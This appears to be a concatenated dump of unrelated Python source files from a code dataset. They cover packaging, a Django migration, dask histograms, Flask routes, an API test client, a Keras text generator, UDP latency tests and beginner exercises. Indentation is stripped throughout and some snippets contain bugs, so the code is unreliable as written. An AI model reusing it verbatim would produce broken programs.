node = Node(10)
node.next = Node(20)
node.previous = Node(5)
'''
from typing import Self
class Result:
def __init__(self, value):
self.value = value
def __str__(self):
return f'{self.__class__.__name__}(value={self.value})'
def add_value(self, value: int) -> Self:
self.value += value
return self
@classmethod
def get(cls, value) -> Self:
return cls(value)
class NewResult(Result):
...
class Node:
def __init__(self, data):
self.data = data
self.next: Self|None = None
self.previous: Self|None = None
|
992,163 | 6d267460a8401a769354177356cd7cc7ac1c4956 | from setuptools import setup, find_packages
with open('README.md') as f:
readme = f.read()
with open('LICENSE') as f:
license = f.read()
setup(
name='long_range_convolutions',
version='0.1.0',
description='Efficient Long Range Convolutions for Point Clouds',
long_description=readme,
author='Leonardo Zepeda-Nunez',
author_email='zepedanunez@wisc.edu',
url='https://github.com/Forgotten/BathFitting',
license=license,
install_requires=['numpy', 'scipy', 'numba', 'tensorflow'],
packages=find_packages(),
classifiers=["Programming Language :: Python :: 3",
"License :: MIT License",
"Operating System :: OS Independent",],
) |
992,164 | e5ce6b873af2584396d5746ecca76554dec190db | # -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2019-03-05 10:24
from __future__ import unicode_literals
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('idgo_admin', '0102_auto_20190225_1622'),
]
operations = [
migrations.RenameField(
model_name='dataset',
old_name='name',
new_name='title',
),
migrations.AlterField(
model_name='resource',
name='ckan_id',
field=models.UUIDField(default=uuid.uuid4, editable=False, unique=True, verbose_name='Ckan UUID'),
),
migrations.AlterField(
model_name='resource',
name='name',
field=models.CharField(max_length=150, verbose_name='Title'),
),
migrations.AlterField(
model_name='resource',
name='restricted_level',
field=models.CharField(blank=True, choices=[('public', 'Tous les utilisateurs'), ('registered', 'Utilisateurs authentifiés'), ('only_allowed_users', 'Utilisateurs authentifiés avec droits spécifiques'), ('same_organization', 'Utilisateurs de cette organisation uniquement'), ('any_organization', 'Organisations spécifiées')], default='public', max_length=20, null=True, verbose_name="Restriction d'accès"),
),
]
|
992,165 | 63b191cd1513b0510da9c358c75a0ba685aae615 | from jetee.base.config_factories_manager import ConfigManager
from jetee.base.config_factory import AnsibleTaskConfigFactory, AnsibleRoleConfigFactory
class TestConfigManager(object):
def test_config_manager_manages_config_factories(self):
config_manager = ConfigManager(
parent=u'', # this would be kwarg for regular task config
config_factories_list=[
AnsibleTaskConfigFactory,
AnsibleRoleConfigFactory,
AnsibleTaskConfigFactory
]
)
configs = config_manager.factory()
assert isinstance(configs, list) |
992,166 | bb4d020b26d41be13720d85f24e945ba8ea67700 | def batas():
print("----------------------------------")
def star(x):
star=''
for _ in range(x):
star+=' * '
print(star)
star(5)
batas()
def star_reverse(x):
#star=' * '
k = x
for _ in range(x):
star=' * '*k
print(star)
k -= 1
star_reverse(5)
batas()
def segitigaAngka(x):
for i in range(x):
k = i + 1
kata=''
for m in range(1, k+1):
kata += str(m) + ' '
print(kata)
segitigaAngka(5)
batas()
def segitigaAngkaReverse(x):
k = x
for _ in range(x):
kata=''
for m in range(k):
kata += str(m+1) + ' '
print(kata)
k -=1
segitigaAngkaReverse(5)
batas()
def segitigaAngka2(x):
for i in range(x):
k = i+1
kata=''
for _ in range (k):
kata += str(k) + ' '
print(kata)
segitigaAngka2(5)
batas()
def segitigaAngka2Reverse(x):
for i in range(x):
k = x - i
kata=''
for _ in range(k):
kata += str(i+1) + ' '
print(kata)
segitigaAngka2Reverse(5)
batas()
def segitigaAngkaBesar(x):
for i in range(x):
k = x
kata=''
for _ in range(i+1):
kata += str(k) + ' '
#print(k)
k-=1
print(kata)
segitigaAngkaBesar(5)
batas()
def segitigaAngkaBesarReverse(x):
for i in range(x):
k= x
kata=''
for _ in range(x-i):
kata += str(k) + ' '
k -=1
print(kata)
segitigaAngkaBesarReverse(5)
batas()
def pangkat(x,y):
hasil=1
for _ in range(abs(y)):
hasil*=x
return hasil if y > 0 else float(1/hasil)
#print(float(hasil))
print(pangkat(2,-1))
#rekursif function: fungsi yang di dalamnya memanggil dirinya sendiri
def pangkatB(x,y):
if y == 1:
return x
else:
return x * pangkatB(x, y-1)
def pangpangkat(x,y):
return pangkatB(x,y) if y > 0 else float(1/(pangkatB(x,y)))
print(pangpangkat(2,3))
# print(pangkatB(2,10))
#faktorial
def factorial(x):
return 1 if x <= 1 else (x*factorial(x-1))
print(factorial(4))
|
992,167 | 19956d3274e5e6ac818ed2b5b763834502744e17 | def stones(N: int, S: str)->int:
# 左から見た黒石の個数の累積和と
# 右から見た白石の個数の累積和を保持し
# その和が最小となる位置を探す。
black, white = [0] * (N+1), [0] * (N+1)
for i, c in enumerate(S):
black[i+1] = black[i]
if c == '#':
black[i+1] += 1
for i, c in enumerate(S[::-1]):
white[N-i-1] = white[N-i]
if c == '.':
white[N-i-1] += 1
# print(black)
# print(white)
return min(black[i] + white[i+1] for i in range(N))
if __name__ == "__main__":
N = int(input())
S = input()
ans = stones(N, S)
print(ans)
|
992,168 | f0719024bc29e76e787c14957588569b9c508fa2 | """Dask-based and dask oriented variants of physt histogram facade functions."""
from __future__ import annotations
from typing import TYPE_CHECKING, cast
import dask
import numpy as np
from dask.array import Array
from physt._facade import h1 as original_h1
from physt._facade import histogramdd as original_hdd
if TYPE_CHECKING:
from typing import Any, Callable, Union
from physt.typing_aliases import ArrayLike
options = {"chunk_split": 16}
def _run_dask(
*,
name: str,
data: Array,
compute: bool,
method: Union[None, str, Callable],
func: Callable,
expand_arg: bool = False,
) -> Any:
"""Construct the computation graph and optionally compute it.
:param name: Name of the method (for graph naming purposes).
:param data: Dask array data
:param func: Function running of each array chunk.
:param compute: If True, compute immediately
:param method: None (linear execution), "threaded" or callable
to apply when computing.
"""
if expand_arg:
graph = dict(
(f"{name}-{data.name}-{index}", (func, *item))
for index, item in enumerate(data.__dask_keys__())
)
else:
graph = dict(
(f"{name}-{data.name}-{index}", (func, item))
for index, item in enumerate(data.__dask_keys__())
)
items = list(graph.keys())
result_name = f"{name}-{data.name}-result"
graph.update(data.dask)
graph[result_name] = (sum, items)
if compute:
if not method:
return dask.get(graph, result_name)
if method in ("thread", "threaded", "threading", "threads"):
return dask.threaded.get(graph, result_name)
if isinstance(method, str):
raise ValueError(f"Invalid method name '{method}'.")
return method(graph, result_name)
return graph, result_name
def histogram1d(data: Union[Array, ArrayLike], bins: Any = None, *, compute: bool = True, **kwargs):
"""Facade function to create one-dimensional histogram using dask.
Parameters
----------
data: dask.DaskArray or array-like (can have more than one dimension)
See also
--------
physt.histogram
"""
if not isinstance(data, Array):
data_np = np.asarray(data)
data = dask.array.from_array(data_np, chunks=int(data_np.shape[0] / options["chunk_split"]))
if not kwargs.get("adaptive", True):
raise ValueError("Only adaptive histograms supported for dask (currently).")
kwargs["adaptive"] = True
def block_hist(array):
return original_h1(array, bins, **kwargs)
return _run_dask(
name="dask_adaptive1d",
data=cast(Array, data),
compute=compute,
method=kwargs.pop("dask_method", "threaded"),
func=block_hist,
)
h1 = histogram1d # Alias for convenience
def histogramdd(data: Union[Array, ArrayLike], bins: Any = None, **kwargs):
"""Facade function to create multi-dimensional histogram using dask.
Each "column" must be one-dimensional.
"""
from dask.array.rechunk import rechunk
if isinstance(data, (list, tuple)):
data = dask.array.stack(data, axis=1)
if not isinstance(data, Array):
data = np.asarray(data)
data = dask.array.from_array(
data, chunks=(int(data.shape[0] / options["chunk_split"]), data.shape[1])
)
else:
data = rechunk(data, {1: data.shape[1]})
if isinstance(data, dask.array.Array):
if data.ndim != 2:
raise ValueError(
f"Only (n, dim) data allowed for histogramdd, {data.shape} encountered."
)
if not kwargs.get("adaptive", True):
raise ValueError("Only adaptive histograms supported for dask (currently).")
kwargs["adaptive"] = True
def block_hist(array):
return original_hdd(array, bins, **kwargs)
return _run_dask(
name="dask_adaptive_dd",
data=cast(Array, data),
compute=kwargs.pop("compute", True),
method=kwargs.pop("dask_method", "threaded"),
func=block_hist,
expand_arg=True,
)
def histogram2d(data1, data2, bins=None, **kwargs):
"""Facade function to create 2D histogram using dask."""
# TODO: currently very unoptimized! for non-dasks
if "axis_names" not in kwargs:
if hasattr(data1, "name") and hasattr(data2, "name"):
kwargs["axis_names"] = [data1.name, data2.name]
if not hasattr(data1, "dask"):
data1 = dask.array.from_array(data1, chunks=data1.size() / 100)
if not hasattr(data2, "dask"):
data2 = dask.array.from_array(data2, chunks=data2.size() / 100)
data = dask.array.stack([data1, data2], axis=1)
kwargs["dim"] = 2
return histogramdd(data, bins, **kwargs)
h2 = histogram2d # Alias for convenience
def h3(data, bins=None, **kwargs):
"""Facade function to create 3D histogram using dask."""
return histogramdd(data, bins, **kwargs)
|
992,169 | 767a0c7c227adbb7d693174c555fd432a7a092a6 | from s3ros import s3ros
|
992,170 | fc06599a0724d122a3af99e163820ec3f4a0c327 | # makeArray.py
# 배열 생성하는 여러 가지 방법
import numpy as np
# zeros : 요소가 0인 배열/행렬을 생성해주는 함수
print(np.zeros(3))
arr = np.zeros((2, 2))
print(arr)
arr2 = np.ones((3, 2))
print(arr2)
# 연립 방정식을 풀고자 할 때 사용(가우스 소거법)
# 크기가 3인 단위 행렬을 만들어 줍니다.
# 정방 행렬 : 행과 열의 크기가 같은 행렬
arr3 = np.eye(3)
print(arr3)
# 모든 요소의 값이 5인 2행 2열의 행렬을 생성
arr4 = np.full((2, 2), 5)
print(arr4)
print('finished') |
992,171 | fb35f238e1981e0e9b4f46ab66a71c7de59dd01e | # Copyright 2016-2023 Swiss National Supercomputing Centre (CSCS/ETH Zurich)
# ReFrame Project Developers. See the top-level LICENSE file for details.
#
# SPDX-License-Identifier: BSD-3-Clause
#
# Generic fallback configuration
#
site_configuration = {
'systems': [
{
'name': 'generic',
'descr': 'Generic example system',
'hostnames': ['.*'],
'partitions': [
{
'name': 'default',
'scheduler': 'local',
'launcher': 'local',
'environs': ['builtin']
}
]
},
],
'environments': [
{
'name': 'builtin',
'cc': 'cc',
'cxx': '',
'ftn': ''
},
],
'logging': [
{
'handlers$': [
{
'type': 'stream',
'name': 'stdout',
'level': 'info',
'format': '%(message)s'
},
],
'handlers': [
{
'type': 'file',
'level': 'debug2',
'format': '[%(asctime)s] %(levelname)s: %(check_info)s: %(message)s', # noqa: E501
'append': False
}
],
'handlers_perflog': [
{
'type': 'filelog',
'prefix': '%(check_system)s/%(check_partition)s',
'level': 'info',
'format': ('%(check_result)s|'
'%(check_job_completion_time)s|%(check_#ALL)s'),
'ignore_keys': [
'check_build_locally',
'check_build_time_limit',
'check_display_name',
'check_executable',
'check_executable_opts',
'check_hashcode',
'check_keep_files',
'check_local',
'check_maintainers',
'check_max_pending_time',
'check_outputdir',
'check_prebuild_cmds',
'check_prefix',
'check_prerun_cmds',
'check_postbuild_cmds',
'check_postrun_cmds',
'check_readonly_files',
'check_sourcepath',
'check_sourcesdir',
'check_stagedir',
'check_strict_check',
'check_tags',
'check_time_limit',
'check_valid_prog_environs',
'check_valid_systems',
'check_variables'
],
'format_perfvars': (
'%(check_perf_value)s|%(check_perf_unit)s|'
'%(check_perf_ref)s|%(check_perf_lower_thres)s|'
'%(check_perf_upper_thres)s|'
),
'append': True
}
]
}
] # end of logging
}
|
992,172 | 63524ad454d1559ef2c06d8d8577a0b6cc3edf98 | from flask import Flask, render_template, request
app = Flask(__name__)
@app.route("/")
def index():
return render_template("index.html")
@app.route("/more", methods = ["POST"])
def more():
name = request.form.get("name")
return render_template("more.html", name=name)
@app.route("/list")
def list():
list=["one", "two", "three", "four", "five"]
return render_template("list.html", list=list)
|
992,173 | c31762d21c8088d5d50b4d4e4dda9349899c5c96 | #!/usr/bin/env python3
import json
import base64
import unittest
import requests
import random
import time
#DOMAIN = "http://127.0.0.1:11501/"
DOMAIN = "http://webapplication:80/"
BASE_URL = f"{DOMAIN}api"
USERNAME = "simulator"
PWD = "super_safe!"
CREDENTIALS = ":".join([USERNAME, PWD]).encode("ascii")
ENCODED_CREDENTIALS = base64.b64encode(CREDENTIALS).decode()
HEADERS = {
"Connection": "close",
"Content-Type": "application/json",
f"Authorization": f"Basic {ENCODED_CREDENTIALS}",
}
L = 0
def get_latest():
global L
L += 1
return L
def is_latest(expected_value: int) -> bool:
response = requests.get(f"{BASE_URL}/latest", headers=HEADERS)
return response.json()["latest"] == expected_value
def create_user(username: str) -> requests.Response:
data = {"username": username, "email": f"{username}@minitwat.dk", "pwd": PWD}
latest = get_latest()
params = {"latest": latest}
response = requests.post(
f"{BASE_URL}/register", data=json.dumps(data), headers=HEADERS, params=params,
)
assert response.ok, f"could not create {username} ({response.text})"
assert is_latest(latest)
return response
class TestStringMethods(unittest.TestCase):
def test_usage_flow(self):
a = hex(hash(random.random()))
create_user(a)
assert is_latest(1)
data = {"content": "Blub!"}
url = f"{BASE_URL}/msgs/{a}"
l = get_latest()
params = {"latest": l}
response = requests.post(
url, data=json.dumps(data), headers=HEADERS, params=params
)
assert response.ok, response.text
assert is_latest(l)
l = get_latest()
query = {"no": 20, "latest": l}
url = f"{BASE_URL}/msgs/"
response = requests.get(url, headers=HEADERS, params=query)
assert response.ok, response.text
assert any(
msg["content"] == "Blub!" and msg["user"] == a for msg in response.json()
), f"`Blub!` not in {response.json()}"
assert is_latest(l)
# Test both endpoints
l = get_latest()
query = {"no": 20, "latest": l}
url = f"{BASE_URL}/msgs/{a}"
response = requests.get(url, headers=HEADERS, params=query)
assert response.ok, response.text
assert any(
msg["content"] == "Blub!" and msg["user"] == a for msg in response.json()
), f"`Blub!` not in {response.json()}"
assert is_latest(l)
b = hex(hash(random.random()))
create_user(b)
c = hex(hash(random.random()))
create_user(c)
url = f"{BASE_URL}/fllws/{a}"
data = {"follow": b}
l = get_latest()
params = {"latest": l}
response = requests.post(
url, data=json.dumps(data), headers=HEADERS, params=params
)
assert is_latest(l)
assert response.ok, response.text
data = {"follow": c}
l = get_latest()
params = {"latest": l}
response = requests.post(
url, data=json.dumps(data), headers=HEADERS, params=params
)
assert is_latest(l)
assert response.ok, response.text
l = get_latest()
query = {"no": 20, "latest": l}
response = requests.get(url, headers=HEADERS, params=query)
assert response.ok, response.text
json_data = response.json()
assert b in json_data["follows"], json_data
assert c in json_data["follows"], json_data
assert is_latest(l)
# first send unfollow command
data = {"unfollow": b}
l = get_latest()
params = {"latest": l}
response = requests.post(
url, data=json.dumps(data), headers=HEADERS, params=params
)
assert response.ok, response.text
assert is_latest(l)
l = get_latest()
# then verify that b is no longer in follows list
query = {"no": 20, "latest": l}
response = requests.get(url, params=query, headers=HEADERS)
assert response.ok, response.text
json_data = response.json()
assert b not in json_data["follows"], json_data
assert c in json_data["follows"], json_data
assert is_latest(l)
if __name__ == "__main__":
unittest.main()
|
992,174 | 9bd99c1c28570f9ba27cc8e45646d7dae73a4b51 |
from flask import Flask
import os
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DATABASE_URL')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
import api |
992,175 | df93dea41e853ebda0acb87d355ff305cc44be9e | #列表list
score=[90,80,60,20,95]
score1=90
scoere=80
scoere=60
scoere=20
scoere=95
print(score)
frined=["黑","黃","綠"]
things=[90,"黑",True]
print(things)
#{} []裡面順序會反過來
print(score[0])
print(score[3])
print(score[-1])
print(score[-2])
#位子0開始取到第2位不包刮第2位
print(score[0:2])
print(score[1:4])
print(score[0:])
print(score[:4])
phrase = "HELLO MR. WHITE"
print(phrase[3])
print(phrase[0:6])
score[0]=30
print(score)
score.extend(frined)
print(score)
#列表後面加一個值
score.append(30)
print(score)
score.insert(1,100)
print(score)
score.remove(80)
print(score)
score.clear()
print(score)
#移除列表最後一位
score.pop()
print(score)
#由小到大排列
score.sort()
print(score)
#列表反轉
score.reverse
#函數位子
print(score.index(100))
#有幾個60
print(score.count(60)) |
992,176 | 28dc97541eb52424ebf708adfe4769f43dbabce9 | import numpy
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Dropout
from keras.layers import LSTM
from keras.callbacks import ModelCheckpoint
from keras.utils import np_utils
import os
import re
import json
# I've used this tutorial: http://machinelearningmastery.com/text-generation-lstm-recurrent-neural-networks-python-keras/.
# I've used this code on FloydHub
def readfile(fname):
with open(fname, 'r') as f:
return f.read().lower()
def preprocess(poem):
# left only words
poem = re.sub('[^!а-яіїєА-ЯІЇЄ\s\,\.\-\—\:\n\!\(\)\?’]', ' ', poem)
return poem.replace('\t', '\n')
folder = '/input/'
# I've decided to use only one book to train
file = 'Stus_Vasyl.Tom_3_1.Palimpsesty.1576.ua.txt'
raw_text = preprocess(readfile(folder + file))
chars = set(raw_text)
char_to_int = { c:i for i, c in enumerate(chars) }
int_to_char = {i:c for i, c in enumerate(chars)}
with open('/output/char_to_int.json', 'w') as f:
json.dump(char_to_int, f)
with open('/output/int_to_char.json', 'w') as f:
json.dump(int_to_char, f)
n_chars = len(raw_text)
n_vocab = len(chars)
print("Total Characters: {}".format(n_chars))
print("Total Vocab: {}".format(n_vocab))
seq_length = 100
dataX = []
dataY = []
for i in range(0, n_chars - seq_length, 1):
seq_in = raw_text[i:i + seq_length]
seq_out = raw_text[i + seq_length]
dataX.append([char_to_int[char] for char in seq_in])
dataY.append(char_to_int[seq_out])
n_patterns = len(dataX)
print("Total Patterns: {}".format(n_patterns))
# reshape X to be [samples, time steps, features]
X = numpy.reshape(dataX, (n_patterns, seq_length, 1))
# normalize
X = X / float(n_vocab)
# one hot encode the output variable
y = np_utils.to_categorical(dataY)
# define the LSTM model
model = Sequential()
model.add(LSTM(256, input_shape=(X.shape[1], X.shape[2]), return_sequences=True))
model.add(Dropout(0.4))
model.add(LSTM(256, return_sequences=True))
model.add(Dropout(0.4))
model.add(LSTM(256))
model.add(Dropout(0.4))
model.add(Dense(y.shape[1], activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam')
# define the checkpoint
filepath="/output/weights-improvement-{epoch:02d}-{loss:.4f}.hdf5"
checkpoint = ModelCheckpoint(filepath, monitor='loss', verbose=1, save_best_only=True, mode='min')
callbacks_list = [checkpoint]
model.fit(X, y, epochs=80, batch_size=128, callbacks=callbacks_list) |
992,177 | 48b3c92cc5934f7a7f72e6119122f30731987528 | from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
def plot():
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
xs =[1,2,3,4,5,6,7,8,9,10]
ys =[5,6,2,3,13,4,1,2,4,8]
zs =[2,3,3,3,5,7,9,11,9,10]
xt =[-1,-2,-3,-4,-5,-6,-7,8,-9,-10]
yt =[-5,-6,-2,-3,-13,-4,-1,2,-4,-8]
zt =[-2,-3,-3,-3,-5,-7,9,-11,-9,-10]
ax.scatter(xs, ys, zs, c='r', marker='o')
ax.scatter(xt, yt, zt, c='b', marker='^')
ax.set_xlabel('X Label')
ax.set_ylabel('Y Label')
ax.set_zlabel('Z Label')
plt.show() |
992,178 | 9f1bcfe1ec918658010281069d56e45cdab2dd90 | from socket import * # for python Socket API
import time # for timestamp data
from threading import Thread # for handling multiple requests
# a method for creating UDP client threads in order to send data to servers
def client(ipv4, port, targetNode):
# an IPv4 socket is created with UDP
# AF_INET is Internet protocol v4 adress family.
# SOCK_DGRAM is a datagram-based protocol
_client = socket(AF_INET, SOCK_DGRAM)
_client.bind(('',port))# binding adress
totalDelay = 0.0 # to keep total delay time
delay = 0.0 # to keep delay for 1 message
i = 0
while i < 1000:
# in order to send request to specified destination
_client.sendto(str(time.time()).encode(),(ipv4,port))
# try to receive data
reply, address = _client.recvfrom(1024)
if reply:
#if reply is not empty calculate the delay and add it to totalDelay, then print it
i+=1
delay = time.time()-float(reply);
totalDelay += delay
print(_client.getsockname(), delay)
f = open(targetNode + "-R3_link_cost.txt", "w") # opens a file
f.write(str(totalDelay/1000.0)) # writes avg. delay to opened file
f.close() # closes the file
_client.close()
# a method for creating UDP server threads in order to receive data from clients
def server(port):
# create a socket and assign given port to it.
_server = socket(AF_INET, SOCK_DGRAM)
_server.bind(('',port))
try:
i = 0
while i < 1000:
data, address = _server.recvfrom(1000) # receive data from the client
if data:
i+=1
_server.sendto(data,address) # if data is not empty send it back
finally:
_server.close()
# create clients to send data on different threads
clientSource = Thread(target = client, args = ('10.10.3.1', 20450, "Source")) # Source
clientSource.start()
clientR2 = Thread(target = client, args = ('10.10.6.1', 20451, "R2")) # R2
clientR2.start()
clientDestination = Thread(target = client, args = ('10.10.7.1', 20452, "Destination")) # Destination
clientDestination.start() |
992,179 | f51bffc70cff988ad09a18ef472456b578bcf54a | # arguments, parameter, variable scope and return values
def myFunction(name):
print("You're name is: " + name)
def getName():
name = input("What is your name:")
return name
def runit():
print("Start the app ...")
myFunction(getName())
# run the program
runit()
# global variable scope
name = getName()
print(name)
|
992,180 | cda45da293c74d94aeb84380d1a5eee3e4a1edbb | """
ACEScg color space.
https://www.oscars.org/science-technology/aces/aces-documentation
"""
from ..channels import Channel
from ..spaces.srgb import sRGB
from .. import algebra as alg
from ..types import Vector
from typing import Tuple
AP1_TO_XYZ = [
[0.6624541811085053, 0.13400420645643313, 0.15618768700490782],
[0.27222871678091454, 0.6740817658111483, 0.05368951740793706],
[-0.005574649490394108, 0.004060733528982825, 1.0103391003129973]
]
XYZ_TO_AP1 = [
[1.6410233796943259, -0.32480329418479004, -0.23642469523761225],
[-0.663662858722983, 1.615331591657338, 0.01675634768553015],
[0.01172189432837537, -0.008284441996237407, 0.9883948585390213]
]
def acescg_to_xyz(acescg: Vector) -> Vector:
"""Convert ACEScc to XYZ."""
return alg.dot(AP1_TO_XYZ, acescg, dims=alg.D2_D1)
def xyz_to_acescg(xyz: Vector) -> Vector:
"""Convert XYZ to ACEScc."""
return alg.dot(XYZ_TO_AP1, xyz, dims=alg.D2_D1)
class ACEScg(sRGB):
"""The ACEScg color class."""
BASE = "xyz-d65"
NAME = "acescg"
SERIALIZE = ("--acescg",) # type: Tuple[str, ...]
WHITE = (0.32168, 0.33767)
CHANNELS = (
Channel("r", 0.0, 65504.0, bound=True),
Channel("g", 0.0, 65504.0, bound=True),
Channel("b", 0.0, 65504.0, bound=True)
)
DYNAMIC_RANGE = 'hdr'
def to_base(self, coords: Vector) -> Vector:
"""To XYZ."""
return acescg_to_xyz(coords)
def from_base(self, coords: Vector) -> Vector:
"""From XYZ."""
return xyz_to_acescg(coords)
|
992,181 | 3c6d1ed2cc1635bc0fb8ca728723eba732af9b45 | from django.contrib import admin
# Register your models here.
from .models import Bahagian
from .models import Tatatertib
#from .models import Zon
# Register your models here.
admin.site.register(Bahagian)
admin.site.register(Tatatertib)
#admin.site.register(Zon) |
992,182 | 0ddfd52211394fa4456993986f4b894ced711ee8 | import string
class Solution:
def uniqueLetterString(self, s: str) -> int:
pos = {l: [-1, -1] for l in string.ascii_uppercase}
res = 0
for i, c in enumerate(s):
j, k = pos[c]
res += (k - j) * (i - k)
pos[c] = [k, i]
for c in pos:
j, k = pos[c]
res += (k - j) * (len(s) - k)
return res % (10**9 + 7)
a = Solution()
print(a.uniqueLetterString("ABA"))
|
992,183 | fc08a72127b10c701b7648e6c1e6250d2f748383 | # -*- encoding: utf-8 -*-
import ConfigParser
import string, os, sys
cf = ConfigParser.ConfigParser()
cf.read("test.conf")
# 返回所有的section
s = cf.sections()
print 'section:', s
o = cf.options("db")
print 'options:', o
v = cf.items("db")
print 'db:', v
v = dict(cf.items("db"))
print 'db:', v
|
992,184 | d53cf8fa7927381604284e10d762e6fdfd3ce5f8 | def is_reverse(first_word, second_word):
""" Verify that the first word is the same as the second word reversed """
if len(first_word) != len(second_word):
return "Not the same as the first word !"
fwd_count = 0
bckwd_count = len(second_word) - 1
while bckwd_count > 0:
if first_word[fwd_count] == second_word[bckwd_count]:
fwd_count += 1
bckwd_count -= 1
else:
return "Not the same as the first word !2"
return first_word + " is the same as " + second_word + " reversed !"
def word_count(lst, word):
""" Count the occurences of the word in a list """
word = word.lower()
count = 0
lst_indx = 0
position = len(lst) - 1
while position > 0:
if word == lst[lst_indx]:
count += 1
lst_indx += 1
position -= 1
else:
lst_indx += 1
position -= 1
return count
def word_list():
""" Get a file with words and make it into a list """
words = open(raw_input('Enter filename :'), 'r')
lst = []
for item in words:
lst.append(item.strip()) #strip() removes the \n that are added by the encoding
return lst
def has_no_e(file_name):
"""Get a file as input and return the amount of words that have the letter 'e' in them """
words = open(file_name, 'r')
count = 0
for item in words:
if 'e' in item:
print item
count += 1
return count
def is_sorted(a_list):
""" Get a list as input, return True if list is sorted and False otherwise."""
sorted_list = sorted(a_list)
if sorted_list == a_list:
return True
else:
return False
def is_anagram(first_word, second_word):
if sorted(first_word) == sorted(second_word):
return True
else:
return False
def words_from_text(file_with_text):
""" Open a file with text and return the number of words and the amount of different words in the text """
import string
text = open(file_with_text, 'r')
words = []
amount_of_words = 0
number_different_words = 0
for line in text:
line = line.replace('-',' ')
for word in line.split():
word = word.strip(string.punctuation + string.whitespace)
word = word.lower()
if word not in words:
number_different_words +=1
words.append(word)
amount_of_words += 1
return (" This book has a total of %s words. It has %s different words !") % (amount_of_words, number_different_words)
print "-- Perlycross -- \n" + words_from_text('project_gutenberg.txt')
print " \n \n "
print "-- Life and Adventures of 'Billy' Dixon -- \n" + words_from_text('project_gutenberg_2.txt')
def robeco_travel(amount_of_people):
""" Calculate travel expenses for Robeco travel """
days = int(raw_input("Enter days of the travel : "))
flight_price = float(raw_input("Enter Plane ticket price : "))
train_price = float(raw_input("Enter Train icket price : "))
hotel_price = float(raw_input("Enter Hotel price per night : "))
daily_accomodation = int(raw_input("Enter Daily accomodation amount : "))
total = (flight_price + train_price + ( hotel_price * days ) + ( daily_accomodation * days )) * amount_of_people
print "The total amount of money for %d people is %d EUR !" % (amount_of_people, total)
#########################################################################################################
# The rest are not completely tested
#########################################################################################################
def ArrayAdditionI(arr):
"""
Take arr and check if the highest number in
arr == to the sum of the rest of the numers.
ex.[4, 6, 23, 10, 1, 3]
return 'true' if 4 + 6 + 10 + 3 = 23
"""
nums = sorted(arr)
#Get highest num
highestNum = max(arr)
currentSum = 0 - highestNum
for num in nums:
currentSum += num
if currentSum < highestNum:
return 'false'
else:
return 'true'
def common_words(first, second):
""" Get two strings of words and return the words that occur in both strings """
# Split the strings into lists of words
first_words = first.split(',')
second_words = second.split(',')
duplicate_words = []
# Check if there are duplicate words in the lists
for item in first_words:
if item in second_words:
duplicate_words.append(item) # Create a list of the duplicate words
result = ','.join(sorted(duplicate_words))
if len(duplicate_words) == 0:
print "There are no common words in the two strings."
return result
def absolute_sort(numbers_array):
return sorted(numbers_array, key=lambda x: abs(x))
def Progression(arr):
"""
Check if arr is a list of numbers that are in Arithmetic, Geometric or without any progression.
Exmaple :
return "Arithmetic" if ex. [2, 4, 6, 8]
return "Geometric" if ex. [2, 6, 18, 54]
return -1 if none
"""
# Check if array is with at least 3 elements
if len(arr) < 3: return 0
# Calculate difference between numbers in list
diffAr = arr[1] - arr[0]
diffGeo = arr[1] / arr[0]
# Temp vars to check if list is in progression
isA = True
isG = True
for num in range(1, len(arr)):
if arr[num] - arr[num - 1] != diffAr: #Check if progression is Arithmetic
isA = False
if arr[num] / arr[num -1] != diffGeo: #Check if progression is Geometric
isG = False
if isA:
return "Arithmetic"
elif isG:
return "Geometric"
else:
return "-1"
# Test function
print Progression([2, 4, 16, 24])
print Progression([5, 10, 15])
print Progression([2, 6, 18, 54])
print Progression([2, 6])
# Palindrome Checker Program
import stack
# welcome
print ('This program can determine if a given string is a palindrome')
print ('(Enter return to exit)')
#init
char_stack = stack.getStack()
empty_string = ''
#get string from user
chars = input('Enter string to check')
while chars != empty_string:
if len(chars) == 1:
print ('A one letter word is by definition a palindrome\n')
else:
#init
is_palindrome = True
# to handle strings of odd lenght
compare_lenght = len(chars) // 2
# push second half of input string on stack
for k in range(compare_lenght, len(chars)):
stack.push(char_Stack, chars[k])
# pop chars and compare to first half of string
k = 0
while k < compare_lenght and is_palindrome:
ch = stack.pop(char_Stack)
if chars[k].lower() != ch.lower():
is_palindrome = False
k = k + 1
# display results
if is_palindrome:
print(chars, 'is a palindrome \n')
else:
print(chars, 'is NOT a palindrome\n')
# get next string from user
chars = input('Enter string to check: ')
|
992,185 | 1777109bf5808d4a88cfef2aff4e676bb2849e26 | def last2(str):
str1 = str[-2:]
n = len(str)
count1 = 0
for i in range(n-1):
# only check substring with length 2 from far left to two to far right in the string.
if i+2 <= n-1:
if str[i:(i+2)] == str1:
count1 = count1 + 1
return(count1)
|
992,186 | 6a465f0a811421155537b1cfd2096145f316e245 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
import random
import time
from threadpool.threadpool import ThreadPool
from network.network_msg import LocalAuthMsg
from dispatcher.login_service import LoginService
def test_for_client():
"""A function to test."""
def queryAction4Test(sock):
i = random.randint(1, 7)
username = 'test' + str(i)
password = 'test'
msg = LocalAuthMsg(
LoginService.SID,
LoginService.HandleLoginCmdID,
0,
username,
password
)
print 'send: ', msg.to_json()
sock.sendall(msg.to_json() + '\n')
def setup_network(host, port):
# print 'setup_network start'
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# sock.setblocking(0)
sock.settimeout(0.01)
sock.connect((host, port))
# print 'setup_network ', sock
return sock
if '__main__' == __name__:
# host = '10.251.40.248'
host = socket.gethostname()
port = 57890
sock = setup_network(host, port)
threadpool = ThreadPool()
# print threadpool
try:
while True:
for i in xrange(2):
threadpool.put(queryAction4Test, (sock,))
# queryAction4Test(sock)
for _ in xrange(10):
data = ''
try:
data = sock.recv(4096)
except:
pass
if data != '':
print 'recieve: ', data
time.sleep(1)
except KeyboardInterrupt:
sock.close()
threadpool.close()
|
992,187 | 0c5352321deda86013dfd09a473ea9da04a4a680 | import pyglet
import time
